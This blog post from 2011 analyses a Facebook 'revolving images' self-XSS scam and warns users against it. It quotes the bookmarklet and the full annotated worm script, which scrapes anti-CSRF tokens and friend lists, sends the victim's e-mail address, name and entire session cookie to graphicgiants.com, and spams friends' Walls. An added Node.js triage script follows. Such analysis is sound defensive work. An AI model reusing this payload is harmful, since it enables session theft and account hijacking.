07 February 2011

Revolving Images Spam on Facebook



Recently on Facebook many people have been tricked into unknowingly spamming one of the following links:
http://bit.ly/91wrzd
http://bit.ly/faceb00ked
http://majicalimages.tk/
The page behind these links claims it will make all the images on your Facebook page pop out and revolve. It does nothing of the sort: its sole purpose is to make you spread the link further by posting this message, in your name, on the Walls of people in your friend list:
Really cool Facebook revolving images. MUST SEE http://majicalimages.tk/
Please DO NOT CLICK on the above links.


Once you are on this page it asks you to paste a line of JavaScript into your address bar while you are on a Facebook page. The JavaScript is:
javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)
All this line does is create a script element pointing at graphicgiants.com/majic.js?show and append it to the current page, so the browser fetches and runs that script with the full privileges of the Facebook page you are logged in to: same origin, same session cookies. Note the scheme-relative "//" URL, which picks up http or https from whatever page you pasted it on.
Every victim who runs it unknowingly spams the link on, which tricks still more people into clicking it.
So I checked it out. If you open graphicgiants.com/majic.js?show directly in a browser you never get to see what JavaScript is being run. However, fetching the same URL with cURL returned the whole script that runs in the background. It is given below (I have indented it and added comments for clearer reading):

// The two spam messages; the script alternates between them (see below)
txt = "Really cool Facebook revolving images. MUST SEE http://niceimages.tk";
txtee = "Really cool Facebook revolving images. MUST SEE http://majicalimages.tk";
// Social engineering: keeps the victim from closing the tab while the script works
alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");
// Step 1: fetch the victim's own Facebook home page and scrape the anti-CSRF
// tokens (composer_id, post_form_id, fb_dtsg) that Facebook's forms require
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
    if (x.readyState == 4 && x.status == 200) {
        comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
        form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        dt = z.match(/name="fb_dtsg" value="([\d\w]+)"/i)[1];
        pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        appid = "150622878317085";
        appname = "rip_m_j";
        // Step 2: fetch the victim's friend list; the victim's user id is read from the c_user cookie
        with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () {
            if (xx.readyState == 4 && xx.status == 200) {
                // Friend ids are taken from the middle number of each profile-picture filename (x_<id>_y_q.jpg)
                m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
                i = 0;
                llimit = 20;
                // Step 3: run the loop below every 2 seconds, 20 times in total
                t = setInterval(function () {
                    if (i >= llimit) return;
                    if (i == 0) {
                        // First round: load the mobile photos page, scrape the victim's e-mail address
                        // (mailto: link) and account name, and send them together with the user id and
                        // the ENTIRE facebook.com cookie to the attacker's server in a script URL
                        with(xxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
                            if (xxx.readyState == 4 && xxx.status == 200) {
                                with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
                                document.body.appendChild(s);
                            }
                        }, send(null);
                    } else if (i == llimit - 1) {
                        // Last round: the same exfiltration again, this time to majic.js
                        with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
                            if (xxxx.readyState == 4 && xxxx.status == 200) {
                                with(s = document.createElement("script")) src = "http://graphicgiants.com/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
                                document.body.appendChild(s);
                            }
                        }, send(null);
                    }
                    // Every round: post one of the two spam messages, as the victim, on a randomly
                    // chosen friend's Wall, using the scraped tokens so Facebook accepts the request
                    if (i % 2 == 0) {
                        with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
                    } else {
                        with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
                    }
                    i += 1;
                }, 2000);
            }
        }, send(null);
    }
}, send(null);

The main points of the script are these. The first two lines prepare the two spam messages. Everything after that works because the script is running inside your logged-in Facebook page, so its XMLHttpRequest (Ajax) calls to facebook.com carry your session. It fetches your home page and scrapes the anti-CSRF tokens (composer_id, post_form_id, fb_dtsg) that Facebook's own forms need; it fetches your friend list and pulls friend ids out of the profile-picture filenames; and it fetches the mobile photos page to scrape your e-mail address and account name. It then injects two more script tags pointing at graphicgiants.com (mmjaicc.js and majic.js) whose URLs carry your user id, e-mail address, name and your ENTIRE document.cookie for facebook.com, so the attacker receives your session cookies, not just the spam. Finally, every two seconds for twenty rounds, it calls /ajax/updatestatus.php with the scraped tokens to post one of the two messages, alternating between them, on a randomly chosen friend's Wall in your name.
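Here is an added example, not part of the original post and not the scam's own code: a small Node.js script that does this kind of triage on a captured payload. It takes the bookmarklet and the text fetched with cURL, never evaluates either, and pulls out what you would put in a report: the hosts and remote script URLs involved, the same-origin Facebook endpoints it calls, the anti-CSRF tokens it scrapes, whether it ships document.cookie to a third party, the spam texts, and how many posts it makes and how often. The payload embedded in it is a constructed, trimmed copy of the lines quoted above so that the script runs offline; the function and variable names are mine, not the scam's.

```javascript
'use strict';
// Added example: static triage of a captured self-XSS payload. The captured
// text is only pattern-matched, never executed, so it is safe to point at the
// raw output of the cURL fetch.

// Constructed sample: the bookmarklet from the post plus a trimmed copy of the
// lines of majic.js that carry its indicators. String.raw keeps the backslashes
// exactly as they appear in the captured file.
const BOOKMARKLET =
  'javascript:(a = (b = document).createElement("script")).src = ' +
  '"//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)';

const PAYLOAD = String.raw`
txt = "Really cool Facebook revolving images. MUST SEE http://niceimages.tk";
txtee = "Really cool Facebook revolving images. MUST SEE http://majicalimages.tk";
alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w]+)"/i)[1];
with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1");
llimit = 20;
t = setInterval(function () {
with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + d.match(/mailto:([^\"]+)/)[1] + "&c=" + document.cookie;
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), send("action=PROFILE_UPDATE&status=" + txt + "&post_form_id=" + form + "&fb_dtsg=" + dt);
i += 1;
}, 2000);
`;

// Strip the javascript: scheme and percent-decode, yielding plain source text.
function decodeBookmarklet(url) {
  const trimmed = url.trim();
  if (!/^javascript:/i.test(trimmed)) throw new Error('not a javascript: URL');
  const body = trimmed.slice('javascript:'.length);
  try { return decodeURIComponent(body); } catch (e) { return body; }
}

// Pull reportable indicators out of the payload (and, optionally, the bookmarklet
// that loaded it). Every field is derived with a targeted regex over the raw text.
function extractIndicators(payload, bookmarklet) {
  const src = (bookmarklet ? decodeBookmarklet(bookmarklet) + '\n' : '') + payload;
  const grab = (re, pick) => Array.from(src.matchAll(re), pick);
  const uniq = (list) => Array.from(new Set(list));
  const limit = src.match(/llimit\s*=\s*(\d+)/);
  const tick = src.match(/\},\s*(\d+)\s*\)/);
  return {
    // remote scripts injected via <script src=...>; a scheme-relative "//" URL
    // inherits http or https from the victim's page
    remoteScripts: uniq(grab(/["']((?:https?:)?\/\/[^"'\s]+\.js[^"'\s]*)["']/g, (m) => m[1])),
    // every hostname that appears in a URL anywhere in the text (spam links included)
    hosts: uniq(grab(/(?:https?:)?\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi, (m) => m[1].toLowerCase())).sort(),
    // same-origin XHR calls, i.e. what it does with the victim's session
    sameOriginRequests: grab(/open\(\s*"(GET|POST)"\s*,\s*"([^"]*)"/g, (m) => m[1] + ' ' + m[2]),
    // hidden form fields it scrapes out of HTML (anti-CSRF tokens)
    csrfTokensHarvested: uniq(grab(/name=\\*"(\w+)\\*"\s+value=/g, (m) => m[1])),
    // a remote script URL built from document.cookie means session exfiltration
    exfiltratesCookies: /src\s*=\s*"https?:\/\/[^"]*"[^;\n]*document\.cookie/.test(src),
    // string literals that read like a message and contain a link
    spamMessages: uniq(grab(/"([^"\n]*\s[^"\n]*https?:\/\/[^"\n]*)"/g, (m) => m[1])),
    postsPerVictim: limit ? Number(limit[1]) : null,
    postIntervalMs: tick ? Number(tick[1]) : null,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(extractIndicators(PAYLOAD, BOOKMARKLET), null, 2));
}
```

Run it with node on the saved cURL output (replace PAYLOAD with the file contents) to get a JSON summary suitable for a phishing report or a blocklist entry; on this sample it reports three hosts, two remote scripts, three harvested tokens, cookie exfiltration, and 20 posts at a 2000 ms interval.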

So this is how you get tricked into spreading the spam. The best countermeasure is NOT TO CLICK on such links, and never to paste anything beginning with javascript: into your address bar, whatever the page promises. If you already ran it, assume the attacker has your session cookies: log out of all sessions and change your password.

Tip 1: You can report the link to Facebook by submitting it and the other details at http://www.facebook.com/help/contact.php?show_form=report_phishing

Tip 2: Check out how to remove the scam from your affected profile and how to safeguard yourself at How to safeguard against the Facebook Revolving Images Scam

Be Safe....
Regards..
AbhiTricks! 

ABOUT THE AUTHOR
AbhiShek SinGh
Founder of 'TheHackingArticles'. Cyber Security Analyst, Cyber Security Researcher, and Software Engineer.
